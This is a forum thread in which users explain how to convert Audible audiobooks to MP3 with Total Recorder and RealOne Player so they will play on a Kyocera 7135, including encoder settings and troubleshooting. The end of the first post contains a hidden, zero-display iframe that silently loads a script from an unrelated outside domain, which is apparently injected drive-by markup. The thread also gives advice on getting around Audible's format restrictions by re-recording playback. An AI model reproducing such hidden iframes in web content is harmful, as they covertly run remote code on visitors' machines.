+ Reply to Thread

Audiobooks on 7135

I haven't got my 7135 yet, but was disappointed when I found out that the 7135 won't replace my MP3 player for audiobooks because Audible won't support the device.

(For those of you who haven't heard of Audible, it's a great service that allows you to purchase audiobooks and download them to your MP3 player. They have a great selection, and a great plan where you can get 2 books for $19.95 a month - go to www.audible.com for more info)

BUT, I found a great program that will convert the .aa files from audible to regular MP3 files that will play on ANY MP3 player (likely including the 7135)

It's called Total Recorder from www.highcriteria.com . It's a little technical to initially set up, but most of us on the board are technically savvy anyways.

Technical setup details follows:
    -Opt for the Professional version ($35.95) as it will let you automatically split the files into 10 minute manageable mp3 files for better navigation.
    -Play the audible files in RealOne Player (download freeware version if you don't have it), so that you can use acceleration and convert the file in 1/10th the time.
    -After many hours of tinkering, I've found the best size to quality ratio of the MP3's to be the following:
    -Use the LAME encoder normal quality (download link on the website for Total Recorder)
    -Use 16 kBit/s, 24,000 hz, mono
    -File size is comparable to Audible format 3

I have no connection to either one of these companies, I just love the ability to listen to audiobooks on the road or in the car on the way to work, so I thought I would share. Please ask away if you have any technical setup questions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Why won't Audible support the 7135?

They don't support it for the same reason they don't support 90% of the MP3 players out there........ They want you to buy their own proprietary device (the 'Otis').

But audio books that are MP3 will work just as any other mp3... I'm seeing more and more books downloadable that are just plain MP3s.

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Where do you find downloadable MP3 audiobooks (that are legal)? I would be interested in the source. Thanks.

damn, there's just not enough time jonn doe's Avatar
    Another note on Total Recorder.
    I have used it for several years now and it has many good functions.
    The one I like the best is that it will record whatever goes thru your sound card so you can stream things off the net and record them. This has many possibilities.
    Beware that some versions of it have been know to have spyware. [use Ad-Aware or Spy-bot to check/remove]
    Gets better every day...... the phone that is.
    *He who lives with the most toys, wins!*
    [and if you are not winning.... alcohol helps]

Are there any preformatted books for Total Recorder. I'm a geek but a lazy one.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

FWIW - Back in late October 2002, Audible announced support for the Palm Tunsten|T (not owning a T|T,I can't confirm that it actually shipped).

I suspect that the big issue is that the decompression of audible format files (.aa) is too CPU intensive for Dragonball devices. MP3s play because they have a chips that the main CPU can ofload that task to that specifically deal with multimedia.

Best bet will be to convert the files from .aa to .mp3 format. Keep the bitrate down - spoken word doesn't need CD quality audio, and you'll fit a larger amount of audio for the same file size.

Using real one acceleration?

How exactly does one do this? I played a audible file and I do not see an option to play it faster. Also if I do play it faster will it record it that way? Or am I missing something, as I have not tried to use total recorder yet. Thanks for any help.
    Using audible.com would make my new 7135 Perfect!

You need Total Recorder to accelerate the Real One Player. It plays it (silently) faster to allow you to record it faster as an mp3 file.

Problem recording

Thanks for all the help. I have been able to set everything up pretty well. However, when I record, the final output has an overwhelming screeching sound over the recording. The recording is fine for the first few minutes then this screeching occurs throughout the rest of the recordings. Also the last recording creates an error, does anyone know what is causing these things?